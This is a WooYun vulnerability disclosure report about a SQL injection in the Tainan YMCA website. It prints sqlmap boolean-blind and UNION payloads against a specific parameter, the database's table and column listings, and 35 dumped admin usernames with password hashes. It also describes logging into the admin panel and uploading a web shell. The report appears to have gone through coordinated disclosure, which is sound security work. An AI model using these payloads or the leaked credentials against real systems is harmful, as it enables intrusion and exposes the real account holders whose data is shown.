当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169791

漏洞标题:台南市基督教青年会网站存在SQL注入getshell(大量用户数据泄漏)(臺灣地區)

相关厂商:台南市基督教青年会

漏洞作者: r1cky_ph3

提交时间:2016-01-19 17:41

修复时间:2016-03-06 14:18

公开时间:2016-03-06 14:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-19: 细节已通知厂商并且等待厂商处理中
2016-01-21: 厂商已经确认,细节仅向厂商公开
2016-01-31: 细节向核心白帽子及相关领域专家公开
2016-02-10: 细节向普通白帽子公开
2016-02-20: 细节向实习白帽子公开
2016-03-06: 细节向公众公开

简要描述:

台南市基督教青年会网站存在SQL注入getshell(大量用户数据泄漏)

详细说明:

台南市基督教青年会**.**.**.**
注入点**.**.**.**/ymca/news_detail.php?id=152
网站管理后台**.**.**.**/nursery/admin/login.php

漏洞证明:

注入点:**.**.**.**/ymca/news_detail.php?id=152

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=152 AND 2980=2980
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=-5710 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176626771,0x7251
5149534a4e644842,0x716f757a71),NULL,NULL,NULL#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15


当前用户数据库

current database:    'ymca_db'


大量表、字段

Database: ymca_db
[77 tables]
+-------------------------+
| ad_banner               |
| admin_account           |
| at_heart_msg            |
| carry_result_class      |
| carry_result_event      |
| carry_result_record     |
| carry_result_record_pic |
| city_name               |
| cjshs_event_photo       |
| cjshs_event_photo_pic   |
| cjshs_news              |
| complain_faq            |
| course_class            |
| course_data             |
| course_faq              |
| course_learn_rpt        |
| course_quest_answer     |
| epaper_article_subject  |
| epaper_main             |
| epaper_section_content  |
| epaper_send_log         |
| epaper_subscriber       |
| event_course            |
| event_course_category   |
| event_course_class      |
| event_course_reg_mail   |
| event_course_section    |
| event_course_series     |
| event_news              |
| event_news_class        |
| event_photo             |
| event_photo_pic         |
| event_reg               |
| exam_accomp             |
| exam_answer             |
| exam_question           |
| exam_sel_item           |
| exam_subject            |
| faq_class               |
| faq_rpt                 |
| forum_class             |
| forum_post              |
| forum_topic             |
| home_ad_links           |
| institute_mail          |
| links_rpt               |
| marquee_news            |
| msg_answer              |
| msg_question            |
| news_rpt                |
| news_rpt_class          |
| nurse_data              |
| nurse_license           |
| nurse_login_log         |
| other_edu_score         |
| park_event_photo        |
| park_event_photo_pic    |
| park_news               |
| quest_answer            |
| quest_class             |
| quest_question          |
| quest_question_class    |
| quest_replier           |
| quest_sel_item          |
| quest_subject           |
| site_content_article    |
| site_content_section    |
| site_content_upfile     |
| site_map_item           |
| teacher_data            |
| teacher_login_log       |
| vote_question           |
| vote_sel_item           |
| xie_event_photo         |
| xie_event_photo_pic     |
| xie_news                |
| zip_code                |
+-------------------------+


Database: ymca_db
Table: teacher_data
[30 columns]
+-------------------------+---------------------+
| Column                  | Type                |
+-------------------------+---------------------+
| acc_status              | char(1)             |
| address                 | tinytext            |
| birthday                | date                |
| dep                     | varchar(50)         |
| e_mail                  | tinytext            |
| end_date                | date                |
| health_insurance_areano | tinyint(3) unsigned |
| hospital_name           | tinytext            |
| hospital_no             | varchar(20)         |
| hp_type                 | tinyint(3) unsigned |
| id                      | int(10) unsigned    |
| job                     | varchar(50)         |
| keyin_date              | datetime            |
| keyin_man               | varchar(20)         |
| license_no              | varchar(20)         |
| login_date              | datetime            |
| mobile                  | varchar(50)         |
| nickname                | varchar(50)         |
| p_id                    | char(10)            |
| pass_word               | varchar(13)         |
| post_count              | int(10) unsigned    |
| realname                | varchar(50)         |
| remark                  | text                |
| sex                     | enum('m','f')       |
| start_date              | date                |
| tel_no                  | varchar(50)         |
| upd_date                | datetime            |
| upd_man                 | varchar(20)         |
| uppic_0                 | varchar(50)         |
| username                | varchar(20)         |
+-------------------------+---------------------+


Database: ymca_db
Table: admin_account
[35 entries]
+------------+---------------+
| username   | pass_word     |
+------------+---------------+
| admin_ymca | adkSkT8r/YRnI |
| ymcacj2    | ymq7RrK/pAyD2 |
| ymca03     | ymq7RrK/pAyD2 |
| ymcacj1    | ymq7RrK/pAyD2 |
| ymcas4a    | ymq7RrK/pAyD2 |
| ymca00     | ymq7RrK/pAyD2 |
| ymca01     | ymVOU3yBz2nU. |
| ymca02     | ymAZq12ILCseM |
| ymcas4b    | ymq7RrK/pAyD2 |
| ymcas4c    | ymq7RrK/pAyD2 |
| ymcas4d    | ymq7RrK/pAyD2 |
| ymcas4e    | ymq7RrK/pAyD2 |
| ymcas1a    | ymq7RrK/pAyD2 |
| ymcas1c    | ymq7RrK/pAyD2 |
| ymcas1b    | ymq7RrK/pAyD2 |
| ymcas1d    | ymq7RrK/pAyD2 |
| ymcas1e    | ymq7RrK/pAyD2 |
| ymcas1f    | ymq7RrK/pAyD2 |
| ymcas1g    | ymq7RrK/pAyD2 |
| ymcas1h    | ymq7RrK/pAyD2 |
| ymcap4a    | ymq7RrK/pAyD2 |
| ymcap4b    | ymq7RrK/pAyD2 |
| ymcap4c    | ymq7RrK/pAyD2 |
| ymcap4d    | ymq7RrK/pAyD2 |
| ymcap1a    | ymq7RrK/pAyD2 |
| ymcap1b    | ymq7RrK/pAyD2 |
| ymcap1c    | ymq7RrK/pAyD2 |
| ymcap1d    | ymq7RrK/pAyD2 |
| ymcap1e    | ymq7RrK/pAyD2 |
| ymcap1f    | ymq7RrK/pAyD2 |
| ymcap1g    | ymq7RrK/pAyD2 |
| ymcap1h    | ymq7RrK/pAyD2 |
| ymcacj3    | ymq7RrK/pAyD2 |
| ymcas1i    | ymq7RrK/pAyD2 |
| ymca_main  | ymO5hfEm8F7Ro |
+------------+---------------+


跑表得到后台管理员账号密码,登陆后台,上传getshell

shell.jpg

修复方案:

过滤

版权声明:转载请注明来源 r1cky_ph3@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2016-01-21 23:33

厂商回复:

感謝通報

最新状态:

暂无